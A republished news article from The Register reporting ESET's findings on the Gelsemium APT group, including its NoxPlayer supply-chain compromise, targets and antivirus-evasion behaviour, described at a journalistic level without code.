perm_phone_msgUNDER ATTACK? S.O.S. LINE 0114 354 0054

Top Categories



Cyber security The Register

Ukraine blames Belarus for PC-wiping ‘ransomware’ that has no recovery method and nukes target boxen

After last week’s website defacements, Ukraine is now being targeted by boot record-wiping malware that looks like ransomware but with one crucial difference: there’s no recovery method. Officials have pointed the finger at Belarus. Fountain at Independence Square in Minsk, Belarus Targets of this new malware wave “span multiple government, [...]

Top Voted
Sorry, there is nothing for the moment.

Mysterious Gelsemium APT was behind February compromise of NoxPlayer, says ESET

Cyber security The Register today09/06/2021 5

share close

ESET has published details of an advanced persistent threat (APT) crew that appears to have deployed recent supply chain attack methods against targets including “electronics manufacturers,” although it didn’t specify which.

“Victims of its campaigns are located in East Asia as well as the Middle East and include governments, religious organizations, electronics manufacturers and universities,” said ESET in a research report published today that names the APT crew as Gelsemium.

Those target countries include China, Japan, Mongolia, Taiwan, North and South Korea, and various Middle Eastern countries according to a map drawn up by ESET. The miscreants’ malware, however, has previously included bypasses intended to evade Chinese-made antivirus suites.

ESET illustration showing Gelsemium's known targets

ESET illustration showing Gelsemium’s known targets

Gelsemium is said to have been behind a supply chain attack targeted at a freeware Android emulator called NoxPlayer, made by BigNox, which boasts of having about 150 million users in total worldwide.

In an incident highlighted by ESET in February before attribution to the APT, BigNox’s update API mechanism may have been compromised to deliver malware to selected users under the guise of a legitimate new version.

First seen in the mid-2010s, Gelsemium has used delivery vectors ranging from plain old spear-phishing at its outset to abuse of the Microsoft Exchange vulnerability seen in Q1 of this year.

Discovery of new APTs is not unusual but still adds to the wider body of infosec knowledge and it certainly makes a change from endless analysis of ransomware gangs’ activities; a valuable lesson that not every threat facing internet-connected organisations today is the one making mainstream telly news headlines.

“During our investigation we found victims where Mimikatz was dropped on machines. The operator uses a Powershell version of the tool, downloaded from a remote server,” added ESET.

The antivirus company, which is based in Slovakia, gave a grateful nod to other infosec research firms in its whitepaper, citing work from companies based as far afield as China itself. Back in 2018 Chinese infosec firm Venustech published (PDF, in Chinese) a paper about what ESET now calls Gelsemium, with one concluding sentence in particular sticking out: “The malware delivered from this organization contains a large number of detection and circumvention methods for Chinese anti-virus software.”

ESET itself highlighted in its own analysis that Gelsemium’s malware payload included checks for, among other common consumer endpoint antivirus suites, Qihoo360 and Kaspersky.

The firm’s Thomas Dupuy told The Register: “This antivirus detection is a bit complex, it is used to tweak the behavior of the malware. For example, stopping the execution of certain processes or mechanisms used to drop the next stage and sometimes terminate the execution of the malware. On top of that, standard user or administrator and Windows version add more versatility. For example, if 360 AV is installed and the Windows version is before Windows Vista it terminates the execution.”

More information is available on ESET’s blog. ®

See the original article here: The Register

Written by: The Register

Rate it
Previous post

Designed by Cloud Boffins